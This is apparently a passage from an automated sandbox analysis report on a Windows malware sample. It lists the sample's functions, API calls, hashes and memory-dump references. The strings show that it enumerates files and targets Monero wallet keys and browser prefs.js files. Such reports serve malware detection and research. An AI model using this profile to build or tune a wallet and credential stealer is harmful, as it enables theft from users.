                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 4e6509e5fe01c721592447f8d6c02afe14882dd925436d506c85f5188b766350
                                    • Instruction ID: 759ef0fc196da9081dddc4e95c99c6138c6be283f2ea115ce8cdc6bb615b01af
                                    • Opcode Fuzzy Hash: 4e6509e5fe01c721592447f8d6c02afe14882dd925436d506c85f5188b766350
                                    • Instruction Fuzzy Hash: 68614771914218ABDF24EBE1EC45EEAB37DAB49701F00468CF60996144EF70AB858F95
                                    Function 006947C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006947D0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006947D7
                                    • wsprintfA.USER32 ref: 006947F6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0069480D
                                    • StrCmpCA.SHLWAPI(?,006A0FAC), ref: 0069483B
                                    • StrCmpCA.SHLWAPI(?,006A0FB0), ref: 00694851
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 006948DB
                                    • FindClose.KERNEL32(000000FF), ref: 006948F0
                                    • lstrcat.KERNEL32(?,0142E370), ref: 00694915
                                    • lstrcat.KERNEL32(?,0142D138), ref: 00694928
                                    • lstrlen.KERNEL32(?), ref: 00694935
                                    • lstrlen.KERNEL32(?), ref: 00694946
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 9b6c0ad96ef6db2d2aa311b6e03762d7f82bb03af4aae3ee053d01b8bd3f7f3f
                                    • Instruction ID: 7fe9da26e15b3538f9d8354fe9819e8de4a160b39c572cdd911777198cfc8994
                                    • Opcode Fuzzy Hash: 9b6c0ad96ef6db2d2aa311b6e03762d7f82bb03af4aae3ee053d01b8bd3f7f3f
                                    • Instruction Fuzzy Hash: CC5164B1518208ABCB60EBB0EC89FEDB37DAB58301F404588B61996150EE74DB85DF91
                                    Function 006940F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00694113
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0069412A
                                    • StrCmpCA.SHLWAPI(?,006A0F94), ref: 00694158
                                    • StrCmpCA.SHLWAPI(?,006A0F98), ref: 0069416E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 006942BC
                                    • FindClose.KERNEL32(000000FF), ref: 006942D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 759c142da621ad2b3dea42683bf313398a21e531c315a4fc98212b3f4c70c4d6
                                    • Instruction ID: 9fd38a40b503fc090b723c5a3d9f1cc79cc6897c8095d4ce2fff840dde8afc8f
                                    • Opcode Fuzzy Hash: 759c142da621ad2b3dea42683bf313398a21e531c315a4fc98212b3f4c70c4d6
                                    • Instruction Fuzzy Hash: 795168B1514218ABCF24EBB0DC45EEAB37DBB54301F40468CB61996450DB74AB858F94
                                    Function 0068EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 0068EE3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0068EE55
                                    • StrCmpCA.SHLWAPI(?,006A1630), ref: 0068EEAB
                                    • StrCmpCA.SHLWAPI(?,006A1634), ref: 0068EEC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0068F3AE
                                    • FindClose.KERNEL32(000000FF), ref: 0068F3C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: 05a19910b2b5d37587af196351ae063610d6af0304a989ea49d9eee2b8437da8
                                    • Instruction ID: 559645850c4c43c5ce5206b5afdf32f09ecf2d9fa9e37ce335453ac376bbe67c
                                    • Opcode Fuzzy Hash: 05a19910b2b5d37587af196351ae063610d6af0304a989ea49d9eee2b8437da8
                                    • Instruction Fuzzy Hash: 56E10E729111189ADF94FBA0CCA2EEE737EAF54300F4045DDB40A66496EE306F89CF95
                                    Function 006C0098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                    • API String ID: 0-1562099544
                                    • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction ID: 862c1134105a4a49251684aee66fd2b1eb39c1bb18a96eed0b4833fdd5bf4e89
                                    • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction Fuzzy Hash: ABE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                    Function 0068F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A16B0,006A0D97), ref: 0068F81E
                                    • StrCmpCA.SHLWAPI(?,006A16B4), ref: 0068F86F
                                    • StrCmpCA.SHLWAPI(?,006A16B8), ref: 0068F885
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0068FBB1
                                    • FindClose.KERNEL32(000000FF), ref: 0068FBC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: f76a51f591ec85fc0b5a4ec5f44b592fe8399ec490fe1d1b9b82de97c3623378
                                    • Instruction ID: 3e3b3712fb4612c45eff327bac116b672fc4f57f70f75cdba7eae19268a674f3
                                    • Opcode Fuzzy Hash: f76a51f591ec85fc0b5a4ec5f44b592fe8399ec490fe1d1b9b82de97c3623378
                                    • Instruction Fuzzy Hash: 94B14071A141089BCF64FFA0DD96AED73BEAF55300F0046ACA40A5A595EF306B48CB96
                                    Function 00681710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A523C,?,?,?,006A52E4,?,?,00000000,?,00000000), ref: 00681963
                                    • StrCmpCA.SHLWAPI(?,006A538C), ref: 006819B3
                                    • StrCmpCA.SHLWAPI(?,006A5434), ref: 006819C9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00681D80
                                    • DeleteFileA.KERNEL32(00000000), ref: 00681E0A
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00681E60
                                    • FindClose.KERNEL32(000000FF), ref: 00681E72
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: a3816504e9ee844ce236c0b9bf527d8a3d60333d6074ed86668c10582ca96814
                                    • Instruction ID: 5ebedb0f09bcf7a5d75cdc6d799df36e829873972918e5d03cb4a237086defa7
                                    • Opcode Fuzzy Hash: a3816504e9ee844ce236c0b9bf527d8a3d60333d6074ed86668c10582ca96814
                                    • Instruction Fuzzy Hash: 111219719101189BCF59FBA0CCA6AFE73BEAF54300F4045DDA10A66495EF306B89CFA5
                                    Function 0068DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006A0C32), ref: 0068DF5E
                                    • StrCmpCA.SHLWAPI(?,006A15C0), ref: 0068DFAE
                                    • StrCmpCA.SHLWAPI(?,006A15C4), ref: 0068DFC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0068E4E0
                                    • FindClose.KERNEL32(000000FF), ref: 0068E4F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 55e94f120ce2e278b496eb8ad939124d0fd00d6fe66030d33c58350efd1d4e26
                                    • Instruction ID: 91f7e15683a20dccab5505270bf362afa0fd17beae9c6a46d2dae42f12391f1f
                                    • Opcode Fuzzy Hash: 55e94f120ce2e278b496eb8ad939124d0fd00d6fe66030d33c58350efd1d4e26
                                    • Instruction Fuzzy Hash: FCF1BB719141189ACF55FBA0CCA5EEEB3BEAF15300F4046DDA00A66495EF306F89CF99
                                    Function 0068DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A15A8,006A0BAF), ref: 0068DBEB
                                    • StrCmpCA.SHLWAPI(?,006A15AC), ref: 0068DC33
                                    • StrCmpCA.SHLWAPI(?,006A15B0), ref: 0068DC49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0068DECC
                                    • FindClose.KERNEL32(000000FF), ref: 0068DEDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: bcdfba6eaa6ebe1f83335c6fba4ac2371723a0cc78ae0728a87878f1dd5ee2c3
                                    • Instruction ID: 03859d9b23634546cb73d5405bc3b1ccfb9ecf4680802f047b2f8af3d5e7305e
                                    • Opcode Fuzzy Hash: bcdfba6eaa6ebe1f83335c6fba4ac2371723a0cc78ae0728a87878f1dd5ee2c3
